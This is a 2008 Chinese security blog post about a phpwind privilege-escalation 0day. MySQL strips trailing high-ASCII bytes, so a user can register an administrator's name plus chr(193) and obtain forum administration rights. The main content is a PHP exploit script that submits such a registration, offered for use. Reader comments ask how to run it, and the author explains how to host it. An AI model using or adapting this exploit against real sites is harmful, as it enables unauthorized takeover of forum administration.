phpwind管理权限泄露漏洞利用程序PHP版

2008-6-2 21:24:16  分类:漏洞信息  作者:xloong 已被围观loading 被网友评论4条 我要评论

夜火:这2天漏洞真多啊,昨天刚发了phpwind 0day 管理权限泄露漏洞 + exploit 利用程序,里面给的是python的exploit,今天来了个PHP的

漏洞原因是Mysql会舍弃没有用处的ASCII129-255,搜了资料也没有找到为什么,PhpWind最大失误不是程序,而是没有把username设为唯一。

可以构造一个和某个管理人员名字一样的ID再加上一个无效的ASCII码进行注册,表中会出现二个一样的用户名,而forums.forumadmin字段里存的用户名,这样就可获得全部的前台权限。

使用PHP构造的测试代码。
phpwind管理权限泄露漏洞利用程序PHP版

<?php
if (empty($_GET['sub'])) {
    print <<<EOT method="get" action="" <form>   
<INPUT name=url>   
<INPUT name=regname>   
<INPUT type=submit value=提交 name=sub>

EOT;
} else {
    extract($_GET);
    $regname .= chr(193);
    $data = array(
        ‘regname’ => $regname,
        ‘regpwd’ => 147852,
        ‘regpwdrepeat’ => 147852,
        ‘regemail’ => ‘llll@Ll.com’,
        'regemailtoall’ => 1,
        ’step’ => 2
    );   

    $url .= ‘/register.php’;
    $includePath = ini_get(’include_path’);
    $includePath .=’;D:\www\pear’;
    ini_set(’include_path’, $includePath);
    include(’HTTP/Client.php’);
    $http = new HTTP_Client();
    var_dump($http-&gt;post($url, $data));
}

作者:yuehei
来源:yuehei 两点之间

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
如原创文章转载,请注明: 转自:夜火博客 [ http://www.15897.com/ ]

本文链接地址: http://www.15897.com/blog/post/phpwind-usertoattack-0day-PHP-exploit.html

Tags: PHPWind   0day   漏洞信息   PHP   exploit  

| More

已有4位网友对本文做了一针见血的评论 【我要评论

  1. My Gravatar Icon alex 说:

    这个具体该怎么使用啊? 望赐教。

  2. My Gravatar Icon xloong 说:

    这是php的代码啊,当然要保存成php格式用了
    放到支持php的空间访问

  3. My Gravatar Icon aswine 说:

    支持php的空间访问无法正确读取啊?里面要修改什么的吗?

  4. My Gravatar Icon xloong 说:

    不知道了~~~

评论:



< # TEMPLATE_INCLUDE_POSTAD # >
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

订阅RSS

搜 索

最新发表

最新评论

最新留言

其 他